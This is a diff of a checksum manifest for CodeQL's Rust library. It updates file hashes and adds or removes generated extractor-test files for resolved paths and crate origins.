@@ -370,7 +370,6 @@ lib/codeql/rust/elements/internal/TupleFieldListImpl.qll ec17ddfe1d03210b7737f9c lib/codeql/rust/elements/internal/TuplePatConstructor.qll 2a5e83ad5b8713a732e610128aeddf14e9b344402d6cf30ff0b43aa39e838418 6d467f7141307523994f03ed7b8e8b1a5bcf860963c9934b90e54582ea38096a lib/codeql/rust/elements/internal/TuplePatImpl.qll 4adb38f0f8dae4ff285b9f5843efb92af419719a7549e0ff62dc56969bd3c852 3f622130771d7731ed053175a83b289bab1d1f5931526c4854923dbcec7e43f1 lib/codeql/rust/elements/internal/TupleStructPatConstructor.qll 9d68f67a17a5cec0e78907a53eccfa7696be5b0571da4b486c8184274e56344a 3ffa29f546cd6c644be4fecc7415477a3a4dc00d69b8764be9119abe4c6d8b9e -lib/codeql/rust/elements/internal/TupleStructPatImpl.qll 896f001d82938bd018516a2b59ba5ad76350edb6b9747ed2ef5b96760aa16388 0552f9c0361d14be9896cbcfda17d8884d03a82c4f23c511a8de77fe71cfbb9f lib/codeql/rust/elements/internal/TupleTypeConstructor.qll 88eaec829cd4dcc6a152c7a335b1d365702ef410e46d9c04806fe53f06325b23 044fd0aca067bae82eb8ac448b7bcc66bc736e7e0ab8b770ee126381888fac3d lib/codeql/rust/elements/internal/TupleTypeImpl.qll 4d570a1d6c3d69d8f62f125c71f67dd90e982801905716d50292f2e652156948 1dcefae60448b21f85d46d252e314d67a9f2a90171e56351e08e2bc0a4077fb8 lib/codeql/rust/elements/internal/TypeAliasConstructor.qll 048caa79eb7d400971e3e6d7e580867cbee4bd6b9d291aafac423aa96c321e76 d1d1e33a789ae6fa1a96af4d23d6376b9d82e14e3cbb777963e2d2cb8b22f66d 
@@ -512,12 +511,12 @@ lib/codeql/rust/elements/internal/generated/ParamList.qll c808c9d84dd7800573832b lib/codeql/rust/elements/internal/generated/ParenExpr.qll bc0731505bfe88516205ec360582a4222d2681d11342c93e15258590ddee82f2 d4bd6e0c80cf1d63746c88d4bcb3a01d4c75732e5da09e3ebd9437ced227fb60 lib/codeql/rust/elements/internal/generated/ParenPat.qll ce24b8f8ecbf0f204af200317405724063887257460c80cf250c39b2fdf37185 e7c87d37e1a0ca7ea03840017e1aa9ddb7f927f1f3b6396c0305b46aeee33db6 lib/codeql/rust/elements/internal/generated/ParenType.qll 9cc954d73f8330dcac7b475f97748b63af5c8766dee9d2f2872c0a7e4c903537 c07534c8a9c683c4a9b11d490095647e420de0a0bfc23273eaf6f31b00244273 -lib/codeql/rust/elements/internal/generated/ParentChild.qll db7a782f11a14305acc666c865118475e2d324d2bf5d4110b157e1d488b62b75 3b5d31528d0baa0ceee139097e93461d18503797a1507288dc43428f378500e2 +lib/codeql/rust/elements/internal/generated/ParentChild.qll 03c1d8e0c0d0f7e34164f6ede37bdc744790fa25b252b5b34b006c48735daef6 7675198b227e5cb357cabe6a7622f461103e3829c0135560b37013c2a914edb2 lib/codeql/rust/elements/internal/generated/Pat.qll 3605ac062be2f294ee73336e9669027b8b655f4ad55660e1eab35266275154ee 7f9400db2884d336dd1d21df2a8093759c2a110be9bf6482ce8e80ae0fd74ed4 -lib/codeql/rust/elements/internal/generated/Path.qll 4c1c8e840ed57880e574142b081b11d7a7428a009f10e3aa8f4645e211f6b2e0 989668cf0f1bdee7557e2f97c01e41d2a56848227fed41477833f5fc1e1d35f6 +lib/codeql/rust/elements/internal/generated/Path.qll bf6a86e7fcb7164624cc070dcce86d2bda50a2516b95115b87d0ebb5596e50a1 fd7a9ad4034cdebe8dfe495619c46f464630d38195313072e0bd904061b0fb00 lib/codeql/rust/elements/internal/generated/PathExpr.qll 2096e3c1db22ee488a761690adabfc9cfdea501c99f7c5d96c0019cb113fc506 54245ce0449c4e263173213df01e079d5168a758503a5dbd61b25ad35a311140 -lib/codeql/rust/elements/internal/generated/PathExprBase.qll d8218e201b8557fa6d9ca2c30b764e5ad9a04a2e4fb695cc7219bbd7636a6ac2 4ef178426d7095a156f4f8c459b4d16f63abc64336cb50a6cf883a5f7ee09113 
-lib/codeql/rust/elements/internal/generated/PathPat.qll 98c9938d6a359fd717829b196eb09701d2c798e18c1f43fa7b2a9145afdf6c19 caba2e629cae08682baac90a76ae9a48cda2d7d6f9c23d506fa0ff3f292978a4 +lib/codeql/rust/elements/internal/generated/PathExprBase.qll 696f580d56804c000983cd839671f0d0d573a9d3dbb151f500e4fe3bf900320b ebae99d1541e0d4e519599b2c5e4d734c20b7ed7ba1dbe1772f59ad7bb2c9f0f +lib/codeql/rust/elements/internal/generated/PathPat.qll 551864a9ba7d60b5662044578f0e12e6995c71710d75d8955eec2d7ab52e4d44 fedd7249e7f00229aa8632154fce2c6f1a37e017f9d4d53a5d309ba40e0c22a5 lib/codeql/rust/elements/internal/generated/PathSegment.qll 0fa07886deb0fc4d909d7edf691238a344f2739900aafb168cbac171eb1729a8 8f4bb418d8bea5e40128a87977c57d0a9183d06d111601ad93130c8615c11465 lib/codeql/rust/elements/internal/generated/PathType.qll df6fd322ba0d99d6cb315edce8dbf099b661b84fdfcc3ad629fdd1fd066c1986 e11c8615cd7b02034b47b58f30a7b6fcbc6d33ec53303288dfd34d9a25f5a186 lib/codeql/rust/elements/internal/generated/PrefixExpr.qll c9ede5f2deb7b41bc8240969e8554f645057018fe96e7e9ad9c2924c8b14722b 5ae2e3c3dc8fa73e7026ef6534185afa6b0b5051804435d8b741dd3640c864e1 
@@ -525,20 +524,20 @@ lib/codeql/rust/elements/internal/generated/PtrType.qll 40099c5a4041314b66932dfd lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll ea294a3ba33fd1bc632046c4fedbcb84dcb961a8e4599969d65893b19d90e590 ea294a3ba33fd1bc632046c4fedbcb84dcb961a8e4599969d65893b19d90e590 lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll efd93730de217cf50dcba5875595263a5eadf9f7e4e1272401342a094d158614 229b251b3d118932e31e78ac4dfb75f48b766f240f20d436062785606d44467b -lib/codeql/rust/elements/internal/generated/Raw.qll 7de290d66bd594f4c5b5a296502792e803e9f1084bb2616d9774196e33b16c87 28150fdd3cff3bb49b407f0c2119602be13e78cbb1f8fd749edd31f5d9772f7a -lib/codeql/rust/elements/internal/generated/RecordExpr.qll eb6cb662e463f9260efae1a6ce874fa781172063b916ef1963f861e9942d308d 1a21cbccc8f3799ff13281e822818ebfb21d81591720a427cac3625512cb9d40 +lib/codeql/rust/elements/internal/generated/Raw.qll b6bfb4c58f879143b78546b9a1f657876a245facdd01f7dd944825ca9dcf3464 867f32b72030b2b234f818e07b55abc3a3b516c91162dda736b8bc761c16afd6 +lib/codeql/rust/elements/internal/generated/RecordExpr.qll 57a25e78a1e501fa6e2876b8412056fb9a50fed79645542e420789333049335e 5f3692fe36d3590ddbb4b6228adf17528a0ab91057940bd9faac000ae735bec1 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 lib/codeql/rust/elements/internal/generated/RecordField.qll 9f7840e1a2a194d5ed1d5201ab483eb01129849d49392581e0328bbc0934305c 
0e019b5b8fe91bc96c7c07933c766d8a09c066d48ed96f24ae3dad303c00585e lib/codeql/rust/elements/internal/generated/RecordFieldList.qll d7bb2677338cf420b0d6371aeec781aacc2272c73413ea96b7418177ad149fb9 5ef52074b9f4ec31e7422b70efdb2e650d673b2625efdfec18a4e48c30e35cf6 -lib/codeql/rust/elements/internal/generated/RecordPat.qll f5f9904fcd8b8fa5fe65b46a68f830021a5e4a68f95ff403151565c3ec770477 56294ed2ff753d8be7742a501b15b5f3f5f20afe0f8171ee6771d049f26489e4 +lib/codeql/rust/elements/internal/generated/RecordPat.qll 0431a89f30da9dff98b850998d58fcf4d7b475f503e9a9eddf3576965514d22a eb06e4b716f6bc4aed962d609a08679a336cfd375fbd34b2c9fce3f4642ed385 lib/codeql/rust/elements/internal/generated/RecordPatField.qll f17b1aa265091fd8309fd90d5c3822d170870e304f160225327de5a844a9aed4 0458e39dbe88060b4b664692cf0b41ebf4364de268d9417658c14c883c9c1b33 lib/codeql/rust/elements/internal/generated/RecordPatFieldList.qll 08d4740bbb519f15ab20b694b3c45e396a2a59cce0f68fa4b9698348784cae43 99919809607ae61c707f591ee609c50bcfb90d5b4f9c263f6b8e78658d21b605 lib/codeql/rust/elements/internal/generated/RefExpr.qll 7d995884e3dc1c25fc719f5d7253179344d63650e217e9ff6530285fe7a57f64 f2c3c12551deea4964b66553fb9b6423ee16fec53bd63db4796191aa60dc6c66 lib/codeql/rust/elements/internal/generated/RefPat.qll 5c4d908f851d89f42cf765007c46ac4199200f9b997f368d5b0e2a435efa82cd 42fd637bc98b5a9275386f1c5fb3ae8c4681987289a89b060991416a25131306 lib/codeql/rust/elements/internal/generated/RefType.qll 3603a3e000acc25c5e675bd4bc4a5551b8f63851591e1e9247709e48d1769dc5 91bea4a1d5ef0779d575567253cd007157d3982524e63a7c49c5cae85cb42e5f lib/codeql/rust/elements/internal/generated/Rename.qll d23f999dab4863f9412e142756f956d79867a3579bd077c56993bdde0a5ac2f1 9256c487d3614bf3d22faa294314f490cf312ab526b8de0882e3a4a371434931 -lib/codeql/rust/elements/internal/generated/Resolvable.qll c038fa24b121ee3e7f6060bce639e7483ea1a14bb552e459b6c67663732dfd6c 4025f2ef318793913e6cfc5d8984e538f402bc062865dcb5496563bec64a2ea9 
+lib/codeql/rust/elements/internal/generated/Resolvable.qll 5579fbd90b106c36828b713b6344c5547d3e449078702efa43b21400f69a1aa8 6ad7f9a0285eb4c69c62de7f23ac1da517f3d468407547685d6607d90fd30641 lib/codeql/rust/elements/internal/generated/RestPat.qll b3a4206e68cf67a0310a466721e7c4b3ab855e65490d589d3d856ad333b3d5e8 30b471bec377784f61d73ef93e74fc0dcec7f512ac4b8791d1ca65f2bcea14b8 lib/codeql/rust/elements/internal/generated/RetType.qll a26860cd526b339b9527c089d126c5486e678dd080e88c60ea2fe641e7d661fd a83c1ce32fd043945ad455b892a60c2a9b6a62d7a5aadf121c4b4056d1dfb094 lib/codeql/rust/elements/internal/generated/ReturnExpr.qll c9c05400d326cd8e0da11c3bfa524daa08b2579ecaee80e468076e5dd7911d56 e7694926727220f46a7617b6ca336767450e359c6fa3782e82b1e21d85d37268 
@@ -551,7 +550,7 @@ lib/codeql/rust/elements/internal/generated/Static.qll 5fbd6879858cf356d4bdaa6da lib/codeql/rust/elements/internal/generated/Stmt.qll 8473ff532dd5cc9d7decaddcd174b94d610f6ca0aec8e473cc051dad9f3db917 6ef7d2b5237c2dbdcacbf7d8b39109d4dc100229f2b28b5c9e3e4fbf673ba72b lib/codeql/rust/elements/internal/generated/StmtList.qll a667193e32341e17400867c6e359878c4e645ef9f5f4d97676afc0283a33a026 a320ed678ee359302e2fc1b70a9476705cd616fcfa44a499d32f0c7715627f73 lib/codeql/rust/elements/internal/generated/Struct.qll 4d57f0db12dc7ad3e31e750a24172ef1505406b4dab16386af0674bd18bf8f4b 1a73c83df926b996f629316f74c61ea775be04532ab61b56af904223354f033e -lib/codeql/rust/elements/internal/generated/Synth.qll 65873a7fa44e223edc5e76cc768591a036eb2550960a6b6882476f43a01aefba 3e08e2bdfba53ae26d8f48f2d240b92b44c603f03105518c37a963e0cbe63e3f +lib/codeql/rust/elements/internal/generated/Synth.qll 1aeee823f44fe6ee94ca8dcace6b6cae952be9fe3f50b4c500a392d01139f322 2cdd764b8c508e8a8288368fc8ac729c4469f08304711960de6ef9ec72434942 lib/codeql/rust/elements/internal/generated/SynthConstructors.qll e929c49ea60810a2bbc19ad38110b8bbaf21db54dae90393b21a3459a54abf6f e929c49ea60810a2bbc19ad38110b8bbaf21db54dae90393b21a3459a54abf6f lib/codeql/rust/elements/internal/generated/Token.qll 77a91a25ca5669703cf3a4353b591cef4d72caa6b0b9db07bb9e005d69c848d1 2fdffc4882ed3a6ca9ac6d1fb5f1ac5a471ca703e2ffdc642885fa558d6e373b lib/codeql/rust/elements/internal/generated/TokenTree.qll 8577c2b097c1be2f0f7daa5acfcf146f78674a424d99563e08a84dd3e6d91b46 d2f30764e84dbfc0a6a5d3d8a5f935cd432413688cb32da9c94e420fbc10665c 
@@ -562,7 +561,7 @@ lib/codeql/rust/elements/internal/generated/TupleExpr.qll 75186da7c077287b9a86fc lib/codeql/rust/elements/internal/generated/TupleField.qll d2580e046a576a1a7669463956c929912e383de304854a86eea5e45807a0a882 b41cbc48fcbb56543705e6bf708b72156307c71735d2ed42b97d8bf3c1099dd1 lib/codeql/rust/elements/internal/generated/TupleFieldList.qll 9d4981d04c2ee005e41035b9699f03bff270c4e0515af5482d02e614a0b1a875 4e60b857fbcb668fa1a001e0eff03f1aa3a7465d32ce68e23544b705fa54fc5d lib/codeql/rust/elements/internal/generated/TuplePat.qll d61163a380f3f2c1709080e2df69a90764509af060e607e27e832862e4dae18c 108b7db493a21fe1fa0db99fceee952aabb0a128eac41e050877ab9136407403 -lib/codeql/rust/elements/internal/generated/TupleStructPat.qll 87e0acfeb51d48c55648d5af783f5ea006aaeccce990ba26458c6935fbdf7c11 7c761e66ddacb51307e653c6ad45bec3fba8315049fbe6c4503ed19241204d41 +lib/codeql/rust/elements/internal/generated/TupleStructPat.qll 987745c3c58df38a41f14fce1b59ee82859de7706680f23e52010937fc4646ee 91446a75fd63af87566ff347a7c25c3f6c9cbd75c0d72bdc99590a1af27e8ef4 lib/codeql/rust/elements/internal/generated/TupleType.qll 7fae8e881157a24c4ce4f960269ba8010e227a81d3055b571f861f7196f868e2 18085a19a102df8e2cded938b49709225e89f0ce68b4a003310647bb259a6bd3 lib/codeql/rust/elements/internal/generated/TypeAlias.qll af02bb172b6f2d7f5eab8645a5a219eee8a4bbc445838f5739f18ba217c7e608 6d871471d673adae99c8b146f6f7ab204f24d52b5013b4582037a42b279c9f05 lib/codeql/rust/elements/internal/generated/TypeArg.qll fe4441b3faa44e542c43a85353347df23d3f74da0c4b17cb0fdc60f5aca9dee7 1473d044e979e7cb6628525ffd454549cd8a37560488c695f534243946cf83bc 
@@ -726,7 +725,9 @@ test/extractor-tests/generated/FormatArgsExpr/FormatArgsExpr_getFormat.ql 02d3fa test/extractor-tests/generated/FormatArgsExpr/FormatArgsExpr_getTemplate.ql c912ac37275cbe7b3b29607bed1a3190c80779436422c14a475113e1bfd91a54 ef90f67a9b952a38ce557b1afbf0b5ce8551e83ddfaad8309a0c9523e40b5ea7 test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql 7a7ee3a3322b4af8cb3b525cfed8cc9719d136ea80aa6b3fb30c7e16394dd93f 5aa8a77d7741b02f8ceb9e5991efa4c2c43c6f1624989218990e985108dae535 test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql 7bd4ec3dde2ef0463585794101e6cc426c368b0e4ab95fbb1f24f8f0a76cf471 e7b01e8b21df5b22c51643e2c909c6fc4ca96fda41b3290c907ba228abe8669b -test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql 2793ba1ff52182dab992d82d3767a000928f6b2fbfdb621349cafc183f0d2480 c3777d03214f7feb9020de3ce45af6556129e39e9b30d083de605b70ab9a0a12 +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql f1b727be65d0563c8dffab61248a1b9a59b221fdaae28d3a3fbde3fb17592f5b dbf2395213d261bcf01c3258ab51f073e7934d58af5e2044b64292ed8f71f9a4 +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql f7288c9be7b31a6c78da9e2f4e774522013c2db8ff457dfb5edced009b65ebdd 58ea795ccf649f733c995c49da4680f68599d58f466cb63415a12f4cc9d0ab11 +test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql 56a0347a705b5719a97f520b2c0777c97e73bc2d977dc5d00910679950eae5ca 1ef63883dd83a22f56f226348e8fb9bf72817df19ff2708a4559a5f7b8a2855a test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql 26d592398a17795427b5b6b51ff4a013ee15c31443e732a000baca5f2e65acca 7940a864b84b89e84d7fb186599cb8b6bcbead7141c592b8ab0c59fcd380d5fb test/extractor-tests/generated/Function/Function.ql c1c2a9b68c35f839ccd2b5e62e87d1acd94dcc2a3dc4c307c269b84b2a0806e6 1c446f19d2f81dd139aa5a1578d1b165e13bddbaeab8cfee8f0430bced3a99ab 
test/extractor-tests/generated/Function/Function_getAbi.ql e5c9c97de036ddd51cae5d99d41847c35c6b2eabbbd145f4467cb501edc606d8 0b81511528bd0ef9e63b19edfc3cb638d8af43eb87d018fad69d6ef8f8221454 
@@ -895,12 +896,16 @@ test/extractor-tests/generated/ParenPat/ParenPat.ql 565182ccd81a9b420911b488c083 test/extractor-tests/generated/ParenPat/ParenPat_getPat.ql 96f3db0ec4e71fd8706192a16729203448ccc7b0a12ba0abeb0c20757b64fba1 0c66ba801869dc6d48dc0b2bca146757b868e8a88ad9429ba340837750f3a902 test/extractor-tests/generated/ParenType/ParenType.ql 81c8ad667397ce36157941abd9b879e9305a440018853af4528eb737ae4d2935 3ef3b86203b0143be2d7f7f4833f55fd6c226cb9205e3c1940b6c2a1371622f3 test/extractor-tests/generated/ParenType/ParenType_getTy.ql 41dd6605e7b348618156712b559e2f1b6aac02d6c727e8cbf8653530794ec969 30ac6611c730e76cfb75f98efcf817783a50cec0cf3b3197459d7642f74dde85 -test/extractor-tests/generated/Path/Path.ql f17c1c4d23c0d5e9776cee84444f6ee7445de88afbc1f26c34b96e13ab618158 89499cb0f63b3634d6b5e2b8c4a13bd4401ce82e54af0ab46e41a34b0288eeb9 -test/extractor-tests/generated/Path/PathExpr.ql b9696cd7ad9f3874e4bc4b1b9c77f42f06ab6c61b77fb641458da63667087b9b db84a7a8dd05e30ff80733af01f08d43ff031bb4b3e3af06332a73ba7e7bbc43 +test/extractor-tests/generated/Path/Path.ql 2bdcd99b3b5ffc83ac47d8cc27a4561d616bcf06844f0c452c699cd10ee640ca 5a7d7ffb8b0c04d6a8cbb2a953761df8561b796c4372bef1bd55c359b2f19911 +test/extractor-tests/generated/Path/PathExpr.ql 7716664d4f2254456df9d0f44836e761df60c96133d484cbda39e6cbb3152610 4ee3dd2b9fb1f223de0151db71cb623e93dea9afec125222f91e2bc02173173d test/extractor-tests/generated/Path/PathExpr_getAttr.ql 2ccac48cd91d86670c1d2742de20344135d424e6f0e3dafcc059555046f92d92 9b7b5f5f9e3674fad9b3a5bcd3cabc0dff32a95640da0fce6f4d0eb931f1757d test/extractor-tests/generated/Path/PathExpr_getPath.ql e7894071313a74166bdd31d7cd974037fcd5a7f0e92d5eec42833266196eb858 46a06e8a1207e7a0fa175cd4b61068e5fd6c43b5575b88986409f0ac2be64c51 -test/extractor-tests/generated/Path/PathPat.ql 823732954a5882e33a37bd0bf0cafb2cec51659a5203a4831eec2516da0e49fa 54001149718a9ca15d8c0d4be63f3fe00a9f0d44fa1309e2f605d7932355ea5d +test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql 
a68a1f0d865d10c955f7ab1fd7614b517e660553b65fabb9daa8f302adbc2602 c47480d6440ae63be27d8158a35536a8d9051817dec1521cdcab297ddb52e1ae +test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql dfa55fe480da0df37670660fc1c54b6c38d47365353bc9d4f662183b33d4e80f 1b18329a7b60805fc073df3149c48f39aa66924d7eefedecbca36a2b170a7fbe +test/extractor-tests/generated/Path/PathPat.ql 6b9d973009f1b4963c7c83b0f5051eda7a76c8fb4a789217b4a25cbab0cdb274 57f0621dd3657b6f4630d5406816effcc6bc1b03361aa12e118e807e28e9e71b test/extractor-tests/generated/Path/PathPat_getPath.ql 6c0c71c80a6e631ea7775ec8660b470ff6b264bab14a399606cf113b1fb190fc 8e34cbb4d064db929e94652e1901ec4f26affa71e30e556b7acdff71dd622cbb +test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql f690fd9a8773e7c73b70f2d64ee919fef8eee243c5a315c4a6d2713d43ea0e43 f37817427c36cec14a2e07f99d3a32f37f3f27a8eafdf170749ec2780054729b +test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql 55df4541a7b0e82198acfcedd7dc99eb564908270e4fb2b032bf05e40fba6fef a5932d884903da901263f88644c8585a45045190d7204f630506c5aece798288 test/extractor-tests/generated/Path/PathSegment.ql efc39cea1b4c0b2b0da6434136334430d074699f84124d6bcf94c24aa854dc64 c0a4bd60c67665c058ca22a59e535e925fdb00dec95ffc5c71697fb0ed78a329 test/extractor-tests/generated/Path/PathSegment_getGenericArgList.ql 8f6e67b3e316309f20e21d7e7944accf66b0256b76fa50ee9a714044c6ec8cea 15f10a701fc4d3f9fd6734da90790cdbc8a1ddd57bf52695740acedcb2e6e485 test/extractor-tests/generated/Path/PathSegment_getNameRef.ql 799d284e2f9267d6bbe67aa7035e525ef347dc74cb3e2180e7b2171b5cb49674 592130bc2358989536abf62e8a261272c851483ede4f19783f7d61ffc1803e4b 
@@ -913,8 +918,6 @@ test/extractor-tests/generated/Path/PathType.ql cb67b05cf7e4f32cbd46ac89a15f6eaf test/extractor-tests/generated/Path/PathType_getPath.ql 7043c7939e4f835e4b2c7e3e207637c362d7a9dbdba0151b38c873fdaf43e7a5 ee2aad1b4fb2b00e1a5d39387848aa164a39e3cd49141f07c175b205c8451bb1 test/extractor-tests/generated/Path/Path_getPart.ql 8aa45a0b58203ef1177166efbe1c2851faf4b4c9a453c83137f0c9298badcdbf b82d490d9b3a8237487cd5da8b3b6fc4aa477977b332a5c6539b3cd4e6d5b45b test/extractor-tests/generated/Path/Path_getQualifier.ql 9af95e22cdf3a65da6a41d93136aef4523db5ce81d38f6ed4bc613f1c68784d0 3102d9241a417a92c97a53ac56a7a8683463f1adc7a593cda1382c0d25b3f261 -test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql 7c0ff524595514630de4178028260d4832bfc4f57bfddec9f8e72a6c6dbf241c 55e617380476c183ef9259199d2cfd551b07466e94bc452c4723754d0c82691b -test/extractor-tests/generated/Path/Path_getResolvedPath.ql 20c8977781dfe687d5db03290612179cf1360eb47b86ea62d25d1eef62a681e7 c35b76e7d63c05dc80867285bb913042cbe90b45d4d4306df9eac2cba5e8db70 test/extractor-tests/generated/PrefixExpr/PrefixExpr.ql 44fb7174365c6deecdc22c720d84617c6e060c05d49c41c90433451588f8aa6f 871fab471c82fede3c36edc003f9decee5bb7844c016951d28be78d0c91487e5 test/extractor-tests/generated/PrefixExpr/PrefixExpr_getAttr.ql fdad6ad5199435ded1e4a9ea6b246e76b904cd73a36aaa4780e84eef91741c5b 75d63940046e62c1efa1151b0cac45b5ec0bab5e39aec2e11d43f6c385e37984 test/extractor-tests/generated/PrefixExpr/PrefixExpr_getExpr.ql 2d1d97f6277794871fbb032ea87ac30b1aa902a74cd874720156162057ea202e b1b9880fce07d66df7ec87f12189c37adf9f233a1d0b38a1b09808d052a95642 
@@ -930,9 +933,11 @@ test/extractor-tests/generated/RangePat/RangePat.ql 97314b9a5543a7471d722ae188a6 test/extractor-tests/generated/RangePat/RangePat_getEnd.ql 723eb5030ec52d3aa3650a3e2de6cc0195a0030630239b972235963320e0d808 2df3b1a6197c3abd43dc743fd09cbf55165e3191f2b49336777594541e5da96a test/extractor-tests/generated/RangePat/RangePat_getOperatorName.ql 564216b2342f56dc8c1aed6306f57b6dafb33de9e3ba337a840a8c077ce95933 2a76ec7a59bada29733a1515bc1ea8bedd37429d1694ca63c7a8fbf94098a4c7 test/extractor-tests/generated/RangePat/RangePat_getStart.ql ad2066efa32fced2dd107031f2a9b9635c3c892e874870a4320522bae9309aa4 b4a8c57a838074e186b823938d1a9372153c193da6c839b5f242ca25c679e83f -test/extractor-tests/generated/RecordExpr/RecordExpr.ql 1b8f5c315f8038e531bd92c5402acdafdbc9468e2f4474cbeffddca37cc87fb6 9458b2815fd13848659bdc2ce1e9566fccdb0b2c9f018c79885ba7608df07a5a +test/extractor-tests/generated/RecordExpr/RecordExpr.ql 220f7f766587dc9df1c6f81a1cda3d19d7d5e92a31c63752061297e1adf96bf0 792bbe4503adcb63f7ac0f11259bb60a8ce05538ba1676f141989a73ff4eb5c0 test/extractor-tests/generated/RecordExpr/RecordExpr_getPath.ql 2eb8f7591f08199d124732d7f2d7dd3e81792a52f8e6c90003aa0609923f8cb0 27e245224d6c9aa20023b418ce8dffff1293b50a0e10938932631fca7c559e78 test/extractor-tests/generated/RecordExpr/RecordExpr_getRecordExprFieldList.ql 6d3d872eb64ff8cd7317190f9b2627d3fa6a74976e362cfb49e21c6623d63f82 d98b07f932ecb25a427e655017de47f951d3eabc4eedbc6f873571ce8921e9ff +test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql 87d463c7950407c86783b9ccbcf6daa4f62f5fcb75bc20f1879bde9240281d4d 5659b4fb8b25cd998211aa3edb11188b3c487cabaf7a09989ce6fe0e4f67ba25 +test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql 0de885c7efdd257ee44d2c8a2ad91e419d604517471966059ddae321e80597b6 7977fb7a8c954733dbb5cf8378d6103688d16bc4c9b891c68098d0ec224429b4 test/extractor-tests/generated/RecordExprField/RecordExprField.ql 
62ee00e478fcf07421b5989943a487ecc0c99cf50ec87f05aabe89dfb03f2a32 ad7c6ce362032e18fc9950b885c4b7b5c907e6abd2af2d13ecef84eb980027fb test/extractor-tests/generated/RecordExprField/RecordExprField_getAttr.ql 789d20f8c0bb0e9567d3d9a0c0266a04841cda0dbdbe10af8c450d5a82bb289e 9036f5b0e7ddf301012f52f3919804382421061366d2a4f3a016e9783befec6d test/extractor-tests/generated/RecordExprField/RecordExprField_getExpr.ql 7dcb5cf0d04bcd62b655fa0626535526cdaa0f891845f4b22cb50fcf1ae3e511 a177db76e4e9583438fad9bfb1300fed9e812c1046c44dccd307bf3a46603a69 
@@ -948,9 +953,11 @@ test/extractor-tests/generated/RecordField/RecordField_getTy.ql 601fbb244267f366 test/extractor-tests/generated/RecordField/RecordField_getVisibility.ql cc45e9bb9418d15cef07a1827358c3f18a8737324c8e6852591a2da70df89360 45557497fc165a212fffda71dedabc8159a4f72323430df732698a18922b366c test/extractor-tests/generated/RecordFieldList/RecordFieldList.ql 586bccfa550243177d9fdfd6900a473f51a76ed360b537f19cb300330d5dad5b a063373dfdbf06b68c69694ea4ae72a26b906c910f9095894c09e72f8fb52819 test/extractor-tests/generated/RecordFieldList/RecordFieldList_getField.ql 2eb92ef8528204f3f105c19a36cdc06b3b6d20242463ff2ed1fb81c544812a71 d69091899e7157099f117e14fe60cd3705cfda45f28f6a6a2b7234a4a9c1e664 -test/extractor-tests/generated/RecordPat/RecordPat.ql 01510828e1facc6551e06241e41636259883a546ad43b08499468c14d6052768 fcf3873fe1cd1ebe4910150763aa350f882ca8e84603f35520bb0beeea2c21af +test/extractor-tests/generated/RecordPat/RecordPat.ql 24469c2a0902196d49249a37a0b56bf9fe62d1e7af3150813200b25ccb46dfaa 479e58d4fe6db7048e0649fd5a9c1b8ca1ceb8aa52a80dd07a999a07e32b0a3f test/extractor-tests/generated/RecordPat/RecordPat_getPath.ql 187b8d44de158fc809257e28b2e8fdd246c8eb3c60115d54cd53396a320e372d 74813fd13c6f34927420ed44620743f7c80c537984e0db72c1c5f4b754b40b83 test/extractor-tests/generated/RecordPat/RecordPat_getRecordPatFieldList.ql 32e45a6f59cdb8edbf7f9326164e225a7f545fabd2dd168b660699954a999fdf 325c9121dc130459426b473691876a0698b51d5cdf4530698a398510ce8e3051 +test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql 61a47db765e0c45797d3f92318fb6dbf07dfe1a2e63704294c58d49cb0894676 86a636746458053278a8ba0be062a9b1cfcad4866e065a8317fa8f033518ecae +test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql 0221208e93c4a26e555dd848238b4f5bcabf2ccf3fc38ceb2eef45c39d67b21a 37d80014a21a19e9132ad645a17234e33bb20f2352b450277b8fa919a54b95e9 test/extractor-tests/generated/RecordPatField/RecordPatField.ql 
6c51343258e56673d21b7ae73e7de011319ffa2eb65390e697f875bb428d25d1 82c3232db0cb353140618749b1cba5549b0ff43cbbaafb203077e18dbedb2c10 test/extractor-tests/generated/RecordPatField/RecordPatField_getAttr.ql fb0592f7a1be4fd9c6f36c79dee5a0f6711b0a7820b079f8e95413722ae1aeb7 9dfb0de00ec9c4a23efd38515c63a3567204f2a3ac2634858296f58aa564d170 test/extractor-tests/generated/RecordPatField/RecordPatField_getNameRef.ql 3380a41d6cecd80681fc955719fa11377c32a5e0be276871f2d0d75ae62d8f0a 44efe89657d3a59fb94962d0fbf52d06571e203863a3d9e9dd47a5135a8ba4d9 
